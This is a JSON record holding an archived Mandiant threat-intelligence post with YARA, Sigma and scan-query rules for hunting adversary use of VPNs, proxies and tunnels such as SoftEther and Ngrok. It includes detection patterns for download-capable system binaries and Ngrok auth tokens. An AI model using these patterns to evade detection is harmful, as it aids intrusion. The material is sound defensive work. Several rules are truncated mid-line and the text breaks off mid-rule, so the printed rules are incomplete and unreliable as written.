{
	"id": "8cecf506-ef52-4638-a561-8d1c0340e338",
	"created_at": "2026-04-06T00:08:12.065537Z",
	"updated_at": "2026-04-10T03:37:04.078884Z",
	"deleted_at": null,
	"sha1_hash": "a7b38b5b8c56a708a410b7ff2a9bbb38d5abdc35",
	"title": "Burrowing your way into VPNs, Proxies, and Tunnels",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 204671,
	"plain_text": "Burrowing your way into VPNs, Proxies, and Tunnels\r\nBy Mandiant\r\nPublished: 2022-06-29 · Archived: 2026-04-05 14:15:44 UTC\r\nTo understand VPN software, one must understand a VPN: A virtual private network is an encrypted connection\r\nover the Internet from a device to a network. The encrypted connection helps ensure that sensitive data is safely\r\ntransmitted. It prevents unauthorized people from eavesdropping on the traffic and allows the user to conduct\r\nwork remotely.\r\nIn the following, VPN software will be defined as any software artifacts which facilitate the use of a VPN\r\nconnection (SoftEther VPN Client, OpenVPN Client, etc).\r\nIn computer science a proxy is a server which resides between the client making a request and the requested\r\ndestination server. Proxies can be used for multiple purposes including network log collection, cache repository,\r\nand providing anonymized internet access. A proxy service is an online resource that allows a user to get the\r\nbenefits of a proxy with none of the infrastructure concerns (RSocks, HideMyAss, Hide.Me, etc).\r\nBoth VPN software and proxy services facilitate the outbound connection from client to server, while localhost\r\ntunneling is similar, it facilitates the connection from the external network back to the client. This is done by what\r\nis commonly called “exposing localhost” (Ngrok, LocalTunnel, Localhost.Run, etc).\r\nBrainstorming over the different hunt and detection directions led to the following conclusion: Detection of\r\nlegitimate software and services at this scale cannot be a narrow implementation of a single detection discipline,\r\nbut rather, expand across multiple disciplines.\r\nInitiating a large-scale hunting and detection operation like this requires brainstorming through the, hopefully\r\nmany, different hunting and detection options available to each organization. 
For example: should the organization\r\nhave no ability to run Snort signatures against network traffic then that type of direction can take the backseat to\r\nother primary detection methods.\r\nAdditionally, when hunting for a technology being utilized as a methodology it is easy to fall into a “whac-a-vendor” type approach focusing on each vendor’s version of the technology (i.e. detection on SoftEther,\r\nNordVPN, Ngrok, etc). This is not a terrible approach, as it has its merits, but it is not ideal. In the following\r\nsections there will be detections highlighted covering SoftEther VPN, Ngrok, and others. These are covered due to\r\nthe threat-dense nature of their use. The ideal hunting process would use more methodology-driven detection,\r\nbeing more vendor-agnostic, as highlighted in the following Hunting Direction sections.\r\nConcern: Adversaries may use innocuous files that house these VPN files inside of themselves to masquerade as\r\nsomething other than remote access software.\r\nDirection: Use detection logic that can peer into the construct of the file itself to identify the VPN artifacts layered\r\nbelow the innocuous files.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 1 of 26\n\nThe following can be considered hunting detections and directions for a variety of files wrapped around VPN\r\nequities and/or VPN files.\r\nRich Text Format files with Embedded Hex Payloads\r\nOpen Office XML files with Embedded VPN Target Domains\r\nOptical Disc Image (ISO Image) files with VPN File or Domain References\r\nMach Object (Mach-O) file with VPN File or Domain References\r\nRTF Embedded Hex Payload with Hex VPN File References\r\nrule M_Hunting_VPNEngine_RTF_Embedded_1 {\r\n meta:\r\n description = \"Detects a suspicious string often used in PE files in a hex encoded object stream along wit\r\n author = \"Mandiant\"\r\n md5 = \"befec87a9742ba8e8f6e61e1133f55fb\"\r\n strings:\r\n $pe = 
\"546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465\" ascii\r\n $mz = /4d5a[a-zA-Z0-9]{19,21}ffff/\r\n $vpn1 = /56504e[a-zA-Z0-9]{0,20}(2e657865|2e646c6c)/ ascii\r\n $vpn2 = /76706e[a-zA-Z0-9]{0,20}(2e657865|2e646c6c)/ ascii\r\n $vpn3 = /70726f7879[a-zA-Z0-9]{0,20}(2e657865|2e646c6c)/ ascii\r\n $vpn4 = /50726f7879[a-zA-Z0-9]{0,20}(2e657865|2e646c6c)/ ascii\r\n $vpn5 = /50524f5859[a-zA-Z0-9]{0,20}(2e657865|2e646c6c)/ ascii\r\n condition:\r\n filesize \u003c 15MB and (uint16(0) == 0x5C7B) and ($pe or $mz) and (1 of ($vpn*))\r\n}\r\nOOXML with Embedded VPN Target Domains\r\nrule M_Hunting_VPNEngine_OOXML_Target_1\r\n {\r\n meta:\r\n description = \"Detects an external relationship link in an OOXML with a VPN or proxy domain.\"\r\n author = \"Mandiant\"\r\n strings:\r\n $relationship_external = /TargetMode=[\\\"\\']External[\\\"\\']/ ascii nocase wide\r\n $anchor = \"\"\r\n $s1 = \" Target=\" ascii nocase\r\n $s2 = \" TargetMode=\" ascii nocase\r\n $s3 = \" Type=\" ascii nocase\r\n $s4 = \" Id=\" ascii nocase\r\n $re = /Target=[\\\"\\'][^\\\"\\']{0,100}(vpn|proxy).{0,100}/ ascii nocase\r\n condition:\r\n (filesize \u003c 10KB) and $anchor and $relationship_external and (1 of ($s*)) and $re\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 2 of 26\n\n}\r\n \r\nISO Files with VPN File or Domain References\r\nrule M_Hunting_VPNEngine_ArchiveEngine_ISOWithEmbeddedVPN_1\r\n {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Looking for ISO files with embedded payloads utilizing VPN strings.\"\r\n md5 = \"4c5f27d28f369da5d5ecce947bb22943\"\r\n strings:\r\n $s1 = /vpn[^\\.]{0,50}\\.(exe|dll|lnk|hta|rtf|ps1|vbs|vbe|pdf|doc)/ ascii nocase fullword\r\n $s2 = /proxy[^\\.]{0,50}\\.(exe|dll|lnk|hta|rtf|ps1|vbs|vbe|pdf|doc)/ ascii nocase fullword\r\n $s3 = /vpn[a-zA-Z0-9\\.]{0,50}\\.(com|io|ru|org|net)/ ascii nocase\r\n $s4 = /proxy[a-zA-Z0-9\\.]{0,50}\\.(com|io|ru|org|net)/ ascii nocase\r\n $s5 = 
\"remote access\" ascii nocase wide fullword\r\n $s6 = /localhost[^a-zA-Z0-9]{0,5}tunnel/ ascii nocase fullword\r\n condition:\r\n uint32(0x8000) == 0x30444301 and uint32(0x8004) == 0x00013130 and any of them\r\n }\r\n \r\nMach-O Files with VPN File or Domain References\r\nrule M_Hunting_MacOS_VPNEngine_MachO_FEBeta_1\r\n {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule looks for Mach-O files with strings indicating relationship with a VPN client\r\n md5 = \"6de8cc7217cb3e0c235fcdde83b1140b\"\r\n strings:\r\n $s1 = /vpn[^\\.]{0,50}\\.(exe|dll|lnk|hta|rtf|ps1|vbs|vbe|pdf|doc)/ ascii fullword nocase\r\n $s2 = /proxy[^\\.]{0,50}\\.(exe|dll|lnk|hta|rtf|ps1|vbs|vbe|pdf|doc)/ ascii fullword nocase\r\n $s3 = /vpn[a-zA-Z0-9\\.]{0,50}\\.(com|io|ru|org|net)/ ascii nocase\r\n $s4 = /proxy[a-zA-Z0-9\\.]{0,50}\\.(com|io|ru|org|net)/ ascii nocase\r\n $s6 = /localhost[^a-zA-Z0-9]{0,5}tunnel/ ascii fullword nocase\r\n condition:\r\n filesize \u003c 15MB and (uint32(0) == 0xBEBAFECA or uint32(0) == 0xFEEDFACE or uint32(0) == 0xFEEDFACF or\r\n }\r\n \r\nOOXML with Embedded Files with VPN Equities\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 3 of 26\n\n# author = \"Mandiant\" ; type = \"OOXML\" ; md5 =\r\n\"a2d34e8c543aef78766b37dcaa5f7686\"\r\nM_Hunting_VPNEngine_OOXML_Target_1;Engine:51-\r\n255,Container:CL_TYPE_ZIP,Target:0;(0\u00261\u00262)\u0026(3|4|5|6);3c3f786d6c;3c773a646f637\r\n56d656e74;353436383639373332303730373236663637373236313664;373637303665;35363\r\n5303465;37303732366637383739;35303732366637383739\r\nIntelligence gathering via VPN client configuration files\r\nConcern: Many VPN clients take configuration files as input, the client itself is the concern, however, the\r\nconfiguration files provide intelligence insight and potential pivot points.\r\nDirection: Use file-based analysis to identify common VPN client configuration files in public stores or on\r\nsystems where these files would not be 
expected.\r\nSoftEther VPN Configuration Identification\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n md5 = \"2586bb9e27a4b3da4ed0f5d15883f84e\"\r\n description = \"Rule looks for SoftEther config file.\"\r\n strings:\r\n $configfile = \"Software Configuration File\" ascii fullword\r\n $softether1 = \"softether\" ascii fullword nocase\r\n $softether2 = \"EnableSoftEtherKernelModeDriver\" nocase\r\n $topFields1 = \"ListenerList\"\r\n $topFields2 = \"LocalBridgeList\"\r\n $topFields3 = \"ServerConfiguration\"\r\n $topFields4 = \"VirtualHUB\"\r\n condition:\r\n filesize \u003c 1MB and $configfile and (1 of ($softether*)) and (1 of ($topFields*))\r\n }\r\n \r\nNgrok VPN Configuration Identification\r\nrule M_Hunting_VPNEngine_NgrokConfig_1\r\n {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for Ngrok YML config file.\"\r\n md5 = \"5d1dbfdc47e820605fedabb98cf17dd5\"\r\n strings:\r\n $header = \"authtoken:\" ascii\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 4 of 26\n\n$tokenRE = /authtoken:\\s+[a-zA-Z0-9]{24,30}_[a-zA-Z0-9]{16,22}/ ascii\r\n $tunnel = \"tunnels:\" ascii\r\n condition:\r\n filesize \u003c 1MB and $header in (0..20) and $tokenRE and $tunnel\r\n }\r\n rule M_Hunting_VPNEngine_NgrokConfig_2\r\n {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for Ngrok YML config file.\"\r\n md5 = \"5d1dbfdc47e820605fedabb98cf17dd5\"\r\n strings:\r\n $header = \"authtoken:\" ascii\r\n $tokenRE = /authtoken:\\s[a-zA-Z0-9]{26,30}_[a-zA-Z0-9]{19,22}/ ascii\r\n condition:\r\n filesize \u003c 1MB and $header at 0 and $tokenRE\r\n }\r\n \r\nProcess execution that is masquerading as something other than what it is, a VPN client or software.\r\nConcern: It is common to see binaries with modified names, like this SoftEther VPN Bridge renamed as\r\niexplore.exe and conhost.exe, and other aspects to mask the true purpose of the file.\r\nDirection: Avoid relying solely on filename-based 
detections hunting more for methodologies that will detect\r\nnamed or renamed processes, files, etc. Use process-based detection logic to identify switches, actions, and\r\nconnections common to VPN components. Even lean on string-based equities to identify a binary’s true identity or\r\nintent.\r\nSoftEther VPN Detection by Network Connections\r\ntitle: 'Renamed SoftEtherVPN by Network Connections (METHODOLOGY)'\r\n description: 'Detect the activity of a renamed SoftEther VPN binary by detecting known domain connections.'\r\n author: Mandiant\r\n date: '2022-06-15'\r\n status: hunting\r\n logsource:\r\n product: 'FireEye HX'\r\n detection:\r\n selectionDomain:\r\n urlMonitorEvent Hostname|contains:\r\n - 'get-my-ip.ddns.softether-network.net'\r\n - 'keepalive.softether.org'\r\n - 'update-check.softether-network.net'\r\n urlMonitorEvent Hostname|re: 'vpn[0-9a-zA-Z]{1,50}\\.softether.net'\r\n filterProcessName:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 5 of 26\n\nurlMonitorEvent Process|contains:\r\n - 'softether'\r\n - 'vpnbridge'\r\n - 'vpnclient'\r\n - 'vpncmgr'\r\n - 'vpngateplugin'\r\n - 'vpninstall'\r\n - 'vpnserver'\r\n - 'vpnsetup'\r\n - 'vpnmgr'\r\n - 'zsatunnel'\r\n condition: selectionDomain and not filterProcessName\r\n fields:\r\n - \"urlMonitorEvent Process\"\r\n - \"urlMonitorEvent Hostname\"\r\n - \"urlMonitorEvent Type\"\r\n - \"urlMonitorEvent Commandline\"\r\n falsepositives:\r\n - \"Known proxy services like ZScaler.\"\r\n level: \"medium\"\r\n \r\nSoftEther VPN Detection by Registry Modifications\r\ntitle: 'Renamed SoftEtherVPN by Registry Modifications (METHODOLOGY)'\r\n description: 'Detect the activity of a SoftEther VPN binary by detecting registry modifications.'\r\n author: Mandiant\r\n date: '2022-06-15'\r\n status: hunting\r\n logsource:\r\n product: 'FireEye HX'\r\n detection:\r\n selectionType:\r\n regKeyEvent Type: 1\r\n selectionStaticPath:\r\n regKeyEvent Path|contains: 
'System\\CurrentControlSet\\Services\\SEVPNCLIENT'\r\n selectionREPath:\r\n regKeyEvent Path|re: 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\[a-zA-Z0-9_\\s-]{0,100}?SoftEt\r\n condition: selectionType and (selectionStaticPath or selectionREPath)\r\n fields:\r\n - \"regKeyEvent Process\"\r\n - \"regKeyEvent Path\"\r\n - \"regKeyEvent Key\"\r\n - \"regKeyEvent Value\"\r\n falsepositives:\r\n - \"Unknown\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 6 of 26\n\nlevel: \"medium\"\r\n \r\nGeneric VPN Switches from Commandline (Hunting)\r\nHunting for common VPN equities in process commandline switches to include but not limited to vpn, proxy, sstp,\r\nand l2tp.\r\n title: 'VPN-like Process with Known Switches (METHODOLOGY)'\r\n description: 'Detect suspected VPN binaries by known commandline switches.'\r\n author: Mandiant\r\n date: '2022-06-15'\r\n status: hunting\r\n logsource:\r\n product: 'FireEye HX'\r\n detection:\r\n selectionProcessType:\r\n processEvent eventType: \"start\"\r\n selectionSwitchOptions1:\r\n processEvent processCmdLine|contains:\r\n - ' --vpn'\r\n - ' --proxy'\r\n selectionSwitchOptionsMethod1:\r\n processEvent processCmdLine|contains:\r\n - 'ssl'\r\n - 'l2tp'\r\n - 'sstp'\r\n selectionSwitchOptions2:\r\n processEvent processCmdLine|contains:\r\n - 'vpn'\r\n - 'proxy'\r\n selectionSwitchOptionsMethod2:\r\n processEvent processCmdLine|contains:\r\n - ' --ssl'\r\n - ' --l2tp'\r\n - ' --sstp'\r\n condition: selectionProcessType and ((selectionSwitchOptions1 and selectionSwitchOptionsMethod1) or (selec\r\n fields:\r\n - \"processEvent processCmdLine\"\r\n - \"processEvent Process\"\r\n - \"processEvent Username\"\r\n - \"processEvent Md5\"\r\n falsepositives:\r\n - \"Unknown\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 7 of 26\n\nlevel: \"low\"\r\n \r\nGeneric VPN Domains from the Process (Hunting)\r\nIdentifying processes that 
initiate a network connection to VPN or proxy domains with the following regular\r\nexpression.\r\n(vpn|proxy)\\.[^.]{1,100}\\.(net|com|org|io|ru)\r\nThis leans heavily on a common practice to use domains in the format of vpn.company[.]com or\r\nproxy.company[.]com. While this is not completely inclusive, it leads to enough hunting opportunities to get\r\nstarted and if they are exhausted the regular expression can be loosened.\r\n title: 'Generic VPN Domains from the Process (Hunting)'\r\n description: 'Identifying processes that initiate a network connection to VPN or proxy domains with the follow\r\n author: Mandiant\r\n date: '2022-06-15'\r\n status: hunting\r\n logsource:\r\n product: 'FireEye HX'\r\n detection:\r\n selectionDomain:\r\n urlMonitorEvent Hostname|re:\r\n - 'vpn\\.[^.]{1,100}\\.(net|com|org|io)'\r\n - 'proxy\\.[^.]{1,100}\\.(net|com|org|io)'\r\n filterProcessName:\r\n urlMonitorEvent Process|contains:\r\n - 'proxy'\r\n - 'vpn'\r\n \r\n condition: selectionDomain and not filterProcessName\r\n fields:\r\n - \"urlMonitorEvent Process\"\r\n - \"urlMonitorEvent Hostname\"\r\n - \"urlMonitorEvent Type\"\r\n - \"urlMonitorEvent Commandline\"\r\n falsepositives:\r\n - \"Known proxy services like ZScaler.\"\r\n - \"Other legitimate in-house proxies.\"\r\n level: \"low\"\r\n \r\nGeneric VPN User Agents from the Process (Hunting)\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 8 of 26\n\nIdentifying the use of legitimate VPN agents leads to a plethora of hunting opportunities. Searching for VPN and\r\nproxy keywords within HTTP user-agent strings will drive these opportunities. 
Applying tuning with a known\r\nauthorized software list or authorized VPN/proxy domains can reduce false positives.\r\n title: 'Generic VPN User Agents from the Process (Hunting)'\r\n description: 'Searching for VPN and proxy keywords within HTTP user-agent strings.'\r\n author: Mandiant\r\n date: '2022-06-15'\r\n status: hunting\r\n logsource:\r\n product: 'FireEye HX'\r\n detection:\r\n selectionUserAgent:\r\n urlMonitorEvent userAgent|contains:\r\n - 'proxy'\r\n - 'vpn'\r\n filterHostname:\r\n urlMonitorEvent Hostname|contains:\r\n - 'vpn'\r\n - 'proxy'\r\n condition: selectionUserAgent and not filterHostname\r\n fields:\r\n - \"urlMonitorEvent Process\"\r\n - \"urlMonitorEvent Hostname\"\r\n - \"urlMonitorEvent Type\"\r\n - \"urlMonitorEvent Commandline\"\r\n falsepositives:\r\n - \"Known proxy services like ZScaler.\"\r\n - \"Other legitimate in-house proxies.\"\r\n - \"FortiSSLVPN\"\r\n - \"GoogleImageProxy\"\r\n - \"ESET Security proxy detection\"\r\n level: \"low\"\r\n \r\nGeneric SoftEther VPN Equities (Hunting)\r\nUtilizing unique equities to detect known SoftEther functionality within a binary will help bypass process name\r\ndetection and identify functionality - such as with UNC3500 in the use-case discussed below.\r\n rule M_Hunting_Linux_VPNEngine_GenericSoftEther_1\r\n {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for SoftEther generic terms in samples.\"\r\n strings:\r\n $domain = \"update-check.softether-network.net\" ascii fullword\r\n $keepalive = \"keepalive.softether.org\"\r\n $vpn = \"SoftEther Corporation\" ascii fullword\r\n condition:\r\n filesize \u003c 10MB and uint32(0) == 0x464c457f and all of them\r\n }\r\n \r\nFiles or processes that, when executed, reach outbound and download a known VPN client\r\nConcern: There are hundreds of ways to perform remote downloads like using living off the land binaries or 
via\r\ncustom code. However, if a process is seen downloading a VPN client in a method that does not follow normal\r\nuser behavior, the intent may be to utilize this client for malicious behavior.\r\nDirection: Identify outbound connections to download VPN client software by living off the land binaries.\r\nLiving off the Land Binaries with VPN Domains\r\nA Living off the Land event describes a computer event in which actors use legitimate software and functions\r\navailable in the system to perform malicious actions on it. These legitimate software binaries are considered\r\nLiving off the Land Binaries (LoLBins) and when combined with VPN or proxy methodologies allow for robust\r\nand camouflaged operations.\r\nUtilizing process data to hunt for these LoLBins that have download functionality in combination with VPN and\r\nproxy domains may lead to identifying their abuse.\r\ntitle: 'Living off the Land Binaries with VPN Domains (Hunting)'\r\ndescription: 'Utilizing process data to hunt for LoLBins that have download functionality in combination with VP\r\nauthor: Mandiant\r\ndate: '2022-06-15'\r\nstatus: hunting\r\nlogsource:\r\n product: 'FireEye HX'\r\ndetection:\r\n selectionProcessName:\r\n urlMonitorEvent Process:\r\n - 'AppInstaller.exe'\r\n - 'Bitsadmin.exe'\r\n - 'CertOC.exe'\r\n - 'CertReq.exe'\r\n - 'Certutil.exe'\r\n - 'cmdl32.exe'\r\n - 'Desktopimgdownldr.exe'\r\n - 'Diantz.exe'\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 10 of 26\n\n- 'Esentutl.exe'\r\n - 'Expand.exe'\r\n - 'Extrac32.exe'\r\n - 'Findstr.exe'\r\n - 'Finger.exe'\r\n - 'GfxDownloadWrapper.exe'\r\n - 'Hh.exe'\r\n - 'Ieexec.exe'\r\n - 'Imewdbld.exe'\r\n - 'Makecab.exe'\r\n - 'MpCmdRun.exe'\r\n - 'PrintBrm.exe'\r\n - 'Replace.exe'\r\n - 'Squirrel.exe'\r\n - 'Wsl.exe'\r\n - 'Xwizard.exe'\r\n selectionUrl:\r\n urlMonitorEvent requestUrl|re: '[a-zA-Z0-9\\.]{0,50}(vpn|proxy)[a-zA-Z0-9\\.]{0,50}\\.exe'\r\n condition: selectionProcessName and 
selectionUrl\r\nfields:\r\n - \"urlMonitorEvent Process\"\r\n - \"urlMonitorEvent Hostname\"\r\n - \"urlMonitorEvent requestUrl\"\r\n - \"urlMonitorEvent Commandline\"\r\nfalsepositives:\r\n - \"Unknown\"\r\nlevel: \"medium\"\r\nProxy Service Directions\r\nInfrastructure configured to receive VPN or proxy connections\r\nConcern: Host-based visibility may be a data source organizations lack, and therefore they have difficulty identifying\r\nthese equities. This leads to a lack of detection and hunting directions.\r\nDirection: Moving from the host to internet infrastructure hunting, there are\r\nnumerous tools and data sources that allow for identifying infrastructure qualities, which may allow analysts to\r\nautomate the detection of certain VPN endpoints and servers.\r\nNote: This is relevant for all three technologies: VPN clients, proxy services, and tunnels.\r\nThe following includes a list of different hunting queries focusing on specific and generic VPN or proxy\r\ninfrastructure.\r\nGeneric VPN and Proxy Domains\r\nGeneric VPN Certificates\r\nMeFound VPN Service\r\nHide.Me VPN Service\r\nOpenVPN Services\r\nCisco IOS SSL VPN Services\r\nWireguard VPN Infrastructure\r\nSoftEther VPN Infrastructure\r\nNgrok Service Infrastructure\r\nGeneric VPN and Proxy\r\nVPN Domain\r\nservices.tls.certificates.leaf_data.issuer.common_name:/.*\\.vpn\\..*\\.[a-z]{1,4}/\r\nProxy Domain\r\nservices.tls.certificates.leaf_data.issuer.common_name:/.*\\.proxy\\..*\\.[a-z]{1,4}/\r\nGeneric VPN Cert CN and Org\r\nGeneric VPN Certificate Common Name and Organization\r\nparsed.issuer.common_name:\"VPN\" and parsed.subject.organization:\"VPN\"\r\nOther VPN Service Domains\r\nMeFound\r\nservices.tls.certificates.leaf_data.issuer.common_name:/[^\\.]+\\.mefound\\.com/\r\nor\r\nservices.tls.certificates.leaf_data.subject.common_name:/[^\\.]+\\.mefound\\.com/\r\nor 
services.tls.certificates.leaf_data.names:/[^\\.]+\\.mefound\\.com/\r\nHide.Me Proxy Server\r\nservices.tls.certificates.leaf_data.names:/.*hide\\.me.*/ services.tls.certificates.leaf_data.names=hideservers\r\nOpenVPN\r\nservices.tls.certificates.leaf_data.subject.organization:\"ocvpn\" or\r\nservices.tls.certificates.leaf_data.subject.common_name:\"ocvpn\"\r\nCisco IOS SSL VPN\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 12 of 26\n\nservices.http.response.headers.set_cookie:/webvpn[a-z]*=.*/\r\nWireguard\r\n(services.http.response.html_title:/.*WireGuard VPN.*/) or\r\n(services.http.response.body:/.*Wireguard VPN.*/)\r\n(services.http.response.html_title:/.*Wireguard.*/ or\r\nservices.http.response.body:/.*Wireguard.*/) and not\r\n((services.http.response.html_title:/.*WireGuard VPN.*/) or\r\n(services.http.response.body:/.*Wireguard VPN.*/)) and not\r\n((services.http.response.html_title:/.*Turnkey WireGuard.*/) or\r\n(services.http.response.body:/.*Turnkey Wireguard.*/))\r\nSoftEther\r\nSoftEther on Abused IP Space\r\nservices.tls.certificates.leaf_data.subject.common_name:/.*\\.softether\\.net/\r\nAND autonomous_system.name=`HETZNER-AS`\r\nservices.tls.certificates.leaf_data.subject.common_name:/.*softether.net/\r\nAND autonomous_system.name=`DIGITALOCEAN-ASN`\r\nservices.tls.certificates.leaf_data.subject.common_name:/.*softether.net/\r\n AND autonomous_system.name=`AS-CHOOPA`\r\nservices.tls.certificates.leaf_data.subject.common_name:/.*\\.softether\\.net/\r\nAND autonomous_system.name=`OVH`\r\nUntrusted SoftEther Certificates\r\nUntrusted VPN Custom SoftEther Certificates\r\nparsed.subject.common_name:/vpn[0-9]{1,15}\\.softether\\.net/ AND tags.raw:\r\n\"untrusted\" AND NOT parsed.subject.common_name:/vpn[0-9]\r\n{1,15}\\.softether\\.net/\r\nUntrusted VPN Non-Custom SoftEther Certificates\r\nparsed.subject.common_name:/vpn[0-9]{1,15}\\.softether\\.net/ AND tags.raw:\r\n\"untrusted\"\r\nSoftEther 
Generic\r\nSoftEther VPN Domain on Certificate\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 13 of 26\n\nsame_service(services.tls.certificates.leaf_data.issuer.common_name:/.*\\.softether\\.net/\r\nAND services.port:443)\r\nHTTP/S SoftEther VPN IPs\r\nsame_service(services.tls.certificates.leaf_data.issuer.common_name:/.*\\.softether\\.net/\r\nAND (services.service_name=`HTTP` OR\r\nservices.extended_service_name=`HTTPS`))\r\nNon-US IP hosting SoftEther VPN domain\r\nsame_service(services.tls.certificates.leaf_data.subject.common_name:/vpn.*softether.net/\r\nAND NOT services.tls.certificates.leaf_data.issuer.country:\"US\")\r\nNgrok Domains\r\nNgrok Domain\r\nservices.tls.certificates.leaf_data.names:/.*ngrok.*/\r\nNgrok Inspect Service\r\nsame_service(services.http.request.uri:/.*inspect.*/ and\r\nservices.http.request.uri:/.*http.*/ and\r\nservices.http.response.html_title:\"ngrok\")\r\nProtonVPN\r\nProton VPN Services\r\nservices.tls.certificates.leaf_data.issuer.organizational_unit:protonvpn or\r\nservices.http.response.html_title:protonvpn\r\nBrowser Extensions used for Proxy Services\r\nConcern: Many proxy services have a companion browser extension and, while not commonly observed, may\r\nallow an adversary to use this service.\r\nAdditionally, adversaries may use loader functionality to access VPN or proxy services via Chrome. This could be\r\nobserved in PowerShell loader scripts or LNK files where the --load-extension switch can be used with Chrome to\r\nload a specific extension.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 14 of 26\n\nDirection: Narrow focus in file analysis to browser extension artifacts and then within said artifacts for VPN\r\nequities. 
This can be done directly against browser extension manifest files or portable executable files.\r\nLoading Chrome VPN or Proxy Extension\r\nrule M_METHODOLOGY_VPNEngine_LoadVPNProxyChromeExtension_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule that looks for files containing strings pertaining to execution of Chrome to\r\n strings:\r\n $r1 = /chrome[^\\r\\n]*?--load-extension=/ ascii nocase wide\r\n $s1 = \"chrome\" ascii wide\r\n $s2 = \"--load-extension=\" ascii wide\r\n $p1 = \"vpn\" ascii wide fullword nocase\r\n $p2 = \"proxy\" ascii wide fullword nocase\r\n condition:\r\n filesize \u003c 50KB and all of ($s*) and $r1 and ($p1 or $p2)\r\n}\r\nChrome Extension Manifest File for Proxies\r\nrule M_Hunting_VPNEngine_ChromeExtensions_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n md5 = \"995f7d9ca805cce59acbeff82ed4adc6\"\r\n strings:\r\n $manifest1 = \"\\\"manifest_version\\\":\" ascii nocase\r\n $manifest2 = \"\\\"name\\\":\" ascii nocase\r\n $manifest3 = \"\\\"version\\\":\" ascii nocase\r\n $optional1 = \"\\\"author\\\":\" ascii nocase\r\n $optional2 = \"\\\"browser_action\\\":\" ascii nocase\r\n $optional3 = \"\\\"content_security_policy\\\":\" ascii nocase\r\n $optional4 = \"\\\"default_icon\\\":\" ascii nocase\r\n $optional5 = \"\\\"default_locale\\\":\" ascii nocase\r\n $optional6 = \"\\\"default_title\\\":\" ascii nocase\r\n $optional7 = \"\\\"description\\\":\" ascii nocase\r\n $optional8 = \"\\\"differential_fingerprint\\\":\" ascii nocase\r\n $optional9 = \"\\\"icons\\\":\" ascii nocase\r\n $optional10 = \"\\\"permissions\\\":\" ascii nocase\r\n $optional11 = \"\\\"background\\\":\" ascii nocase\r\n $anchorre1 = /\\\"default_title\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre2 = /\\\"description\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre3 = /\\\"name\\\": \\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre4 = /\\\"short_name\\\": 
\\\"[^\\\"]{0,100}[pP]roxy[^\\\"]{0,100}\\\"/ ascii\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/burrowing-your-way-into-vpns\r\nPage 15 of 26\n\n$anchorre5 = /\\\"default_title\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre6 = /\\\"description\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre7 = /\\\"name\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n $anchorre8 = /\\\"short_name\\\": \\\"[^\\\"]{0,100}(VPN|\\s+vpn|vpn\\s+)[^\\\"]{0,100}\\\"/ ascii\r\n condition:\r\n filesize \u003c 1MB and $manifest1 and $manifest2 and $manifest3 and (2 of ($optional*)) and (1 of ($anchorre\r\n}\r\nChrome Extension Equities in a Binary\r\nrule M_Hunting_VPNEngine_ChromeExtensionInBinary_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n md5 = \"2e09a136e40143ed3317c9ce6ea027a6\"\r\n strings:\r\n $manifest1 = \"\\\"manifest_version\\\":\" ascii nocase\r\n $manifest2 = \"\\\"name\\\":\" ascii nocase\r\n $manifest3 = \"\\\"version\\\":\" ascii nocase\r\n $optional1 = \"\\\"author\\\":\" ascii nocase\r\n $optional2 = \"\\\"browser_action\\\":\" ascii nocase\r\n $optional3 = \"\\\"content_security_policy\\\":\" ascii nocase\r\n $optional4 = \"\\\"default_icon\\\":\" ascii nocase\r\n $optional5 = \"\\\"default_locale\\\":\" ascii nocase\r\n $optional6 = \"\\\"default_title\\\":\" ascii nocase\r\n $optional7 = \"\\\"description\\\":\" ascii nocase\r\n $optional8 = \"\\\"differential_fingerprint\\\":\" ascii nocase\r\n $optional9 = \"\\\"icons\\\":\" ascii nocase\r\n $optional10 = \"\\\"permissions\\\":\" ascii nocase\r\n $optional11 = \"\\\"background\\\":\" ascii nocase\r\n $anchorre1 = /\\\"default_title\\\": 